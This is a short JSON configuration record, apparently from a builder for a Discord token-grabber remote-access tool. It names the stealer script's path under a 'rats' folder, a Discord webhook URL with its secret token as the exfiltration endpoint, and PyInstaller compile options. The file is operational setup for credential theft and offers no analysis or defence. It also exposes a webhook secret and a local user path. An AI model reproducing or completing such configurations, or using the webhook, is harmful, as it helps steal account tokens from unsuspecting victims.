{"name": "ErenKarayilancikofteyiyo", "path": "C:\\Users\\ilayd\\OneDrive\\Masa\u00fcst\u00fc\\Alex_grabbers-main\\utilities\\rats\\Token-grabber\\Token-grabber.py", "requirements": "C:\\Users\\ilayd\\OneDrive\\Masa\u00fcst\u00fc\\Alex_grabbers-main\\utilities\\rats\\Token-grabber\\requirements.txt", "webhook": "https://discord.com/api/webhooks/1355970478866694245/QgEIYIHelrUE5AcpzppqoH6J_pIPTZ8SbJCGqLTaZandTWf1wT9hFRVr9VpptHRwrorX", "exe_yn": "n", "exe_comp": "Pyinstaller", "icon": "None"}